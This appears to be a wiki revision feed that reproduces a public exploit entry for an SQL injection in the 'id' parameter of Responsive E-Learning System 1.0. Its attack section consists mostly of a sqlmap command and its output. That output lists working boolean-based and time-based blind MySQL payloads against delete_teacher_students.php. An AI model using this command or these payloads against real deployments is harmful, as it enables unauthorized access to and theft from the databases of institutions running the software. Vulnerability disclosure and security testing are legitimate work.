https://pwnwiki.com/index.php?action=history&feed=atom&title=Responsive_E-Learning_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%2Fzh-tw
Responsive E-Learning System 1.0 SQL注入漏洞/zh-tw - Revision history
2026-04-04T02:32:03Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Responsive_E-Learning_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/zh-tw&diff=6981&oldid=prev
Pwnwiki: Created page with "==測試環境=="
2021-07-10T10:25:17Z
<p>Created page with "==測試環境=="</p>
<p><b>New page</b></p><div><languages /><br />
==測試環境==<br />
Windows 10/Kali Linux<br />
<br />
==EXP==<br />
<pre><br />
# Exploit Title: Responsive E-Learning System 1.0 – 'id' Sql Injection<br />
# Date: 2020-12-24<br />
# Exploit Author: Kshitiz Raj(manitorpotterk)<br />
# Vendor Homepage: https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html<br />
# Software Link: https://www.sourcecodester.com/download-code?nid=5172&title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code<br />
# Version: 1.0<br />
# Tested on: Windows 10/Kali Linux<br />
<br />
The 'id=' parameter in Responsive E-Learning System is vulnerable to Sql<br />
Injection.<br />
<br />
*Vulnerable Url : *http://localhost/elearning/delete_teacher_students.php?id=17<br />
-p <http://localhost/elearning/delete_teacher_students.php?id=17%0D-p> id<br />
<br />
# sqlmap -u<br />
http://192.168.127.1//elearning/delete_teacher_students.php?id=17 -p id<br />
<br />
___<br />
<br />
<br />
__H__<br />
<br />
<br />
___ ___["]_____ ___ ___<br />
{1.3.11#stable}<br />
<br />
|_ -| . [.] | .'| .<br />
|<br />
<br />
|___|_ [']_|_|_|__,|<br />
_|<br />
<br />
|_|V... |_| http://sqlmap.org<br />
<br />
<br />
<br />
<br />
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior<br />
mutual consent is illegal. It is the end user's responsibility to obey all<br />
applicable local, state and federal laws. Developers assume no liability<br />
and are not responsible for any misuse or damage caused by this program<br />
<br />
<br />
<br />
[*] starting @ 08:59:01 /2020-12-24/<br />
<br />
<br />
08:59:33] [INFO] checking if the injection point on GET parameter 'id' is a<br />
false positive<br />
<br />
GET parameter 'id' is vulnerable. Do you want to keep testing the others<br />
(if any)? [y/N] y<br />
<br />
sqlmap identified the following injection point(s) with a total of 402<br />
HTTP(s) requests:<br />
<br />
---<br />
<br />
Parameter: id (GET)<br />
<br />
Type: boolean-based blind<br />
<br />
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or<br />
GROUP BY clause<br />
<br />
Payload: id=17' RLIKE (SELECT (CASE WHEN (7532=7532) THEN 17 ELSE 0x28<br />
END))-- YDSn<br />
<br />
<br />
<br />
Type: time-based blind<br />
<br />
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />
<br />
Payload: id=17' AND (SELECT 4939 FROM (SELECT(SLEEP(5)))EQuU)-- RaGm<br />
<br />
---<br />
<br />
[08:59:38] [INFO] the back-end DBMS is MySQL<br />
<br />
web application technology: PHP 7.2.34, Apache 2.4.46<br />
<br />
back-end DBMS: MySQL >= 5.0.12<br />
</pre></div>
Pwnwiki